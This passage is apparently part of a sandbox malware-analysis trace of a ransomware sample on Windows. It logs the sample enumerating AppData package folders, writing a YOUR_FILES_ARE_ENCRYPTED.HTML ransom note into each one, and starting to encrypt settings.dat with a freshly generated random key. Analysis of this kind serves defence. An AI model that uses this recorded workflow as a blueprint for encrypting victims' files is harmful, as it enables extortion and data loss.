ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b5e, dwReserved1=0x3187ab8, cFileName="..", cAlternateFileName="")) returned 0 [0121.295] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0121.295] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 120 [0121.295] GetProcessHeap () returned 0x600000 [0121.295] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3151028 [0121.296] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.devicesflow_cw5n1h2txyewy\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0121.297] WriteFile (in: hFile=0x338, lpBuffer=0x3151028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3151028*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.298] CloseHandle (hObject=0x338) returned 1 [0121.298] GetProcessHeap () returned 0x600000 [0121.298] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3151028 | out: hHeap=0x600000) returned 1 [0121.298] GetProcessHeap () returned 0x600000 [0121.298] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.298] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b6deebf, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b6deebf, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1b6deebf, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0121.298] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.298] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalCache") returned 93 [0121.298] GetProcessHeap () returned 0x600000 [0121.298] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.298] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalCache" [0121.298] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalCache\\*" [0121.298] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b6deebf, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b6deebf, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1b6deebf, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b5e, dwReserved1=0x3187ab8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0121.299] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b6deebf, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b6deebf, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1b6deebf, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b5e, dwReserved1=0x3187ab8, cFileName="..", cAlternateFileName="")) returned 1 [0121.299] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b6deebf, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b6deebf, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1b6deebf, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b5e, dwReserved1=0x3187ab8, cFileName="..", cAlternateFileName="")) returned 0 [0121.299] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0121.299] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0121.299] GetProcessHeap () returned 0x600000 [0121.299] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3151028 [0121.299] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.devicesflow_cw5n1h2txyewy\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0121.299] WriteFile (in: hFile=0x338, lpBuffer=0x3151028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3151028*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.300] CloseHandle (hObject=0x338) returned 1 [0121.300] GetProcessHeap () returned 0x600000 [0121.300] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3151028 | out: hHeap=0x600000) returned 1 [0121.300] GetProcessHeap () returned 0x600000 [0121.300] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.300] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b6deebf, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b6deebf, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1b6deebf, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0121.300] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.301] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalState") returned 93 [0121.301] GetProcessHeap () returned 0x600000 [0121.301] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.301] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalState" [0121.301] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalState\\*" [0121.301] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b6deebf, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b6deebf, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1b6deebf, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b5e, dwReserved1=0x3187ab8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0121.301] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b6deebf, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b6deebf, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1b6deebf, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b5e, dwReserved1=0x3187ab8, cFileName="..", cAlternateFileName="")) returned 1 [0121.301] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b6deebf, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b6deebf, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1b6deebf, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b5e, dwReserved1=0x3187ab8, cFileName="..", cAlternateFileName="")) returned 0 [0121.301] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0121.301] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0121.301] GetProcessHeap () returned 0x600000 [0121.301] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3151028 [0121.301] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.devicesflow_cw5n1h2txyewy\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0121.302] WriteFile (in: hFile=0x338, lpBuffer=0x3151028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3151028*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.303] CloseHandle (hObject=0x338) returned 1 [0121.303] GetProcessHeap () returned 0x600000 [0121.303] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3151028 | out: hHeap=0x600000) returned 1 [0121.303] GetProcessHeap () returned 0x600000 [0121.303] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.303] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b6deebf, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b6deebf, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1b6deebf, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0121.303] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.303] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\RoamingState") returned 95 [0121.303] GetProcessHeap () returned 0x600000 [0121.303] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.303] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\RoamingState" [0121.303] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\RoamingState\\*" [0121.303] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b6deebf, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b6deebf, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1b6deebf, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b5e, dwReserved1=0x3187ab8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0121.303] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b6deebf, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b6deebf, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1b6deebf, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b5e, dwReserved1=0x3187ab8, cFileName="..", cAlternateFileName="")) returned 1 [0121.303] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b6deebf, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b6deebf, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1b6deebf, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b5e, dwReserved1=0x3187ab8, cFileName="..", cAlternateFileName="")) returned 0 [0121.303] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0121.303] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0121.303] GetProcessHeap () returned 0x600000 [0121.304] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.304] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.devicesflow_cw5n1h2txyewy\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0121.304] WriteFile (in: hFile=0x338, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.305] CloseHandle (hObject=0x338) returned 1 [0121.305] GetProcessHeap () returned 0x600000 [0121.305] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.305] GetProcessHeap () returned 0x600000 [0121.305] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.306] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b6deebf, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xc372dde6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xc372dde6, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0121.306] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.306] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings") returned 91 [0121.306] GetProcessHeap () returned 0x600000 [0121.306] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.306] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings" [0121.306] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings\\*" [0121.306] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b6deebf, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xc372dde6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xc372dde6, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b5e, dwReserved1=0x3187ab8, cFileName=".", cAlternateFileName="")) returned 0x626978 [0121.308] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b6deebf, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xc372dde6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xc372dde6, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b5e, dwReserved1=0x3187ab8, cFileName="..", cAlternateFileName="")) returned 1 [0121.308] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b79dad4, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b79dad4, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1b79dad4, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b5e, dwReserved1=0x3187ab8, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0121.308] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.308] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings\\roaming.lock") returned 104 [0121.308] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0121.308] lstrlenW (lpString=".lock") returned 5 [0121.308] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0121.308] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b6deebf, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xc37ec85c, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x3187b5e, dwReserved1=0x3187ab8, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0121.308] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.308] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings\\settings.dat") returned 104 [0121.308] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0121.308] lstrlenW (lpString=".dat") returned 4 [0121.308] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0121.308] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0121.308] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.devicesflow_cw5n1h2txyewy\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0121.308] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0121.308] GetProcessHeap () returned 0x600000 [0121.308] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0121.311] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="B2") returned 2 [0121.311] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="6C") returned 2 [0121.311] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="6F") returned 2 [0121.311] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="C6") returned 2 [0121.311] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="A6") returned 2 [0121.311] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="C9") returned 2 [0121.311] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="BB") returned 2 [0121.311] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="B9") returned 2 [0121.311] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="54") returned 2 [0121.311] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="05") returned 2 [0121.311] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="C3") returned 2 [0121.311] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="98") returned 2 [0121.311] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="74") returned 2 [0121.311] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="40") returned 2 [0121.311] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="0C") returned 2 [0121.311] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="85") returned 2 [0121.311] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="7E") returned 2 [0121.311] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="DA") returned 2 [0121.311] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="A0") returned 2 [0121.311] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="33") returned 2 [0121.311] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="F3") returned 2 [0121.311] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="C3") returned 2 [0121.311] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="1D") returned 2 [0121.311] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="D2") returned 2 [0121.311] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="DB") returned 2 [0121.312] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="3E") returned 2 [0121.312] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="E4") returned 2 